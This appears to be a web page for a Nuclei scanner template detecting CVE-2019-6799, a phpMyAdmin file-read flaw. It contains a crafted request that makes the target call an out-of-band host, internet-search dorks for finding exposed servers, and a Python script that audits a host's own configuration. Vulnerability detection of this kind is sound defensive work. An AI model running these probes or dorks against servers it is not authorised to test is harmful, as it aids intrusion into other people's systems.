phpMyAdmin <4.8.5 - Local File Inclusion
ID: CVE-2019-6799
Severity: medium
Author: pwnhxl
Tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli
Description
phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server’s user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFILE) calls.
YAML Source

id: CVE-2019-6799

info:
  name: phpMyAdmin <4.8.5 - Local File Inclusion
  author: pwnhxl
  severity: medium
  description: |
    phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability.
  reference:
    - https://paper.seebug.org/1112/#_4
    - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
    - https://github.com/rmb122/rogue_mysql_server
    - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
    - https://nvd.nist.gov/vuln/detail/CVE-2019-6799
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2019-6799
    epss-score: 0.1829
    epss-percentile: 0.96069
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query:
      - title:"phpmyadmin"
      - http.title:"phpmyadmin"
      - http.component:"phpmyadmin"
      - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
    fofa-query:
      - body="pma_servername" && body="4.8.4"
      - title="phpmyadmin"
    google-query: intitle:"phpmyadmin"
    hunter-query:
      - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
      - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
  tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli

http:
  - raw:
      - |
        GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /index.php
        - /pma/index.php
        - /pmd/index.php
        - /phpMyAdmin/index.php
        - /phpmyadmin/index.php
        - /_phpmyadmin/index.php

    attack: batteringram
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - compare_versions(version, '< 4.8.5')

      - type: dsl
        dsl:
          - compare_versions(version, '> 3.9.9')

      - type: dsl
        dsl:
          - compare_versions(phpversion, '< 7.3.4')

      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        words:
          - mysqli_real_connect

      - type: word
        words:
          - pma_servername

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - \?v=([0-9.]+)
        internal: true

      - type: regex
        group: 1
        regex:
          - \?v=([0-9.]+)

      - type: regex
        name: phpversion
        group: 1
        regex:
          - "X-Powered-By: PHP/([0-9.]+)"
        internal: true
        part: header
# digest: 4a0a00473045022028aebadb5958af247778b876a8bf8d533f6d64e23f0cc83edfd02b99ae1a4e4902210089b6ecfb79827370a9f6922f00daecdb4bba553a3b28525d5ff0e642bcd80276:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-6799.yaml"
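
A host-side counterpart to the remote scan, as an added example that is not part of the Nuclei template or of phpMyAdmin: it checks a server's own config.inc.php and php.ini for the conditions named in the description and in the template's version matchers. The function names and sample inputs are constructed for illustration, and the php.ini check accepts both the `mysql.allow_local_infile` spelling used in the description and the mysqli extension's `mysqli.allow_local_infile`.

```python
import re

def vtuple(version):
    """'4.8.4' -> (4, 8, 4) so versions compare numerically."""
    return tuple(int(p) for p in version.split("."))

def arbitrary_server_enabled(config_php):
    """True when the last active $cfg['AllowArbitraryServer'] assignment is true."""
    text = re.sub(r"/\*.*?\*/", "", config_php, flags=re.S)   # drop block comments
    text = re.sub(r"^\s*(//|#).*$", "", text, flags=re.M)     # drop whole-line comments
    hits = re.findall(
        r"\$cfg\[\s*['\"]AllowArbitraryServer['\"]\s*\]\s*=\s*(\w+)\s*;", text)
    return bool(hits) and hits[-1].lower() in ("true", "1")

def local_infile_setting(php_ini):
    """Return True/False for an explicit allow_local_infile line, None if unset."""
    value = None
    for line in php_ini.splitlines():
        m = re.match(r"\s*mysqli?\.allow_local_infile\s*=\s*\"?(\w+)", line)
        if m:  # lines starting with ';' are php.ini comments and never match
            value = m.group(1).lower() in ("1", "on", "true", "yes")
    return value

def audit(pma_version, php_version, config_php, php_ini):
    """List which of the advisory and template conditions hold on this host."""
    findings = []
    if vtuple("3.9.9") < vtuple(pma_version) < vtuple("4.8.5"):
        findings.append("phpMyAdmin version in affected range (< 4.8.5)")
    if vtuple(php_version) < vtuple("7.3.4"):
        findings.append("PHP version matches template condition (< 7.3.4)")
    if arbitrary_server_enabled(config_php):
        findings.append("AllowArbitraryServer is true")
    if local_infile_setting(php_ini) is not False:
        findings.append("allow_local_infile not explicitly disabled")
    return findings

# Constructed sample inputs (not taken from any real host).
SAMPLE_CONFIG = """<?php
// $cfg['AllowArbitraryServer'] = false;
$cfg['Servers'][1]['host'] = 'localhost';
$cfg['AllowArbitraryServer'] = true;
"""
SAMPLE_INI = "; mysqli.allow_local_infile = Off\nmysqli.allow_local_infile = On\n"

if __name__ == "__main__":
    for finding in audit("4.8.4", "7.2.10", SAMPLE_CONFIG, SAMPLE_INI):
        print("[!]", finding)
```

An empty list from `audit` means none of the listed conditions were found in the supplied files; any finding is a prompt to upgrade to 4.8.5 or later as the template's remediation states.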